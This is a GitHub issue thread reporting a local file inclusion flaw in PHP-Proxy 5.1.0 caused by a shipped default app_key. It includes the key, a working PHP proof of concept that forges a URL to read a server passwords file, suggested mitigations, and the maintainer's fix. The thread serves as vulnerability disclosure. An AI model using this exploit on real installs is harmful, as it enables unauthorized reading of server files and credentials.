New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PHP-Proxy 5.1.0 - Local File Inclusion (LFI) Vulnerability (on default pre-installed version) #134

Closed
ameerpornillos opened this Issue Nov 13, 2018 · 2 comments

Comments

Projects
None yet
3 participants
@ameerpornillos

ameerpornillos commented Nov 13, 2018

Brief description of this vulnerability:

Downloadable pre-installed version of PHP-Proxy 5.1.0 (current as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. (example: http://php-proxy-site/php-proxy/index.php?q=<encrypted_string_value>)

Affected Version:

5.1.0 (pre-installed version)

Reason of this vulnerability:

The downloadable pre-installed version of PHP-Proxy 5.1.0 (current pre-installed version as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) already contains the default app_key in config.php file which might be used by several users using the application thus is vulnerable to local file inclusion.

//default app_key from config.php file
$config['app_key'] = 'aeb067ca0aa9a3193dce3a7264c90187';

Encrypted URL value lies on the app_key as seen on a snippet of code below.

//encryption function of the application
$url = str_rot_pass($url, $key);

Wherein which the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address.

//encryption_key depends on which default url_mode is set to 2 depends on the md5 hash of the app_key and IP address
Config::set('encryption_key', md5(Config::get('app_key').$_SERVER['REMOTE_ADDR']));

Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload.

Proof of Concept:

Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP-Proxy 5.1.0 application URL: example: http://192.168.0.130/php-proxy/index.php?q=<encrypted_string_value> (replace <encrypted_string_value> with the generated encrypted string value)

<?php
$file = "file:///C:/xampp/passwords.txt"; //example target file to read
$ip = "192.168.0.1"; //change depending on your IP address that access the app
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";
$key = md5($app_key.$ip);
function str_rot_pass($str, $key, $decrypt = false){
    $key_len = strlen($key);
    $result = str_repeat(' ', strlen($str));
    for($i=0; $i<strlen($str); $i++){
        if($decrypt){
            $ascii = ord($str[$i]) - ord($key[$i % $key_len]);
        } else {
            $ascii = ord($str[$i]) + ord($key[$i % $key_len]);
        }
        $result[$i] = chr($ascii);
    }
    return $result;
}
function base64_url_encode($input){
    return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
}
echo base64_url_encode(str_rot_pass($file, $key));
?>

Below screenshot is an example of gaining an encrypted URL string within which used to read the C:/xampp/passwords.txt of the server.

php-proxy-5 1 0-lfi-vulnerability

Impact:

Gain access to arbitrary local files in the server.

Suggested Mitigation:

There is already a setup.txt included on the downloadable pre-installed version of PHP-Proxy which will generate and overwrite the default app_key, however users most probably don't use it and kept on using the default app_key.

Possible mitigation is make the app_key value in the config.php blank and make users just make use of the setup.txt to generate and overwrite the default app_key.

@Benji-Collins

This comment has been minimized.

Benji-Collins commented Nov 13, 2018

Thanks for pointing this out. There are probably quite a few installs affected by this.

Another possible fix is to leave the app_key value blank and make the proxy throw an error (and not search) if it is not changed (in the same style that other search related errors are shown, above the URL bar).

@Athlon1600

This comment has been minimized.

Owner

Athlon1600 commented Dec 15, 2018

Fixed.
A preinstalled version of php-proxy that exists here:

https://www.php-proxy.com/download/php-proxy.zip

will no longer include app_key by default, and will have to be generated manually by the user or else they get:

app_key inside config.php cannot be empty!

@Athlon1600 Athlon1600 closed this Dec 15, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment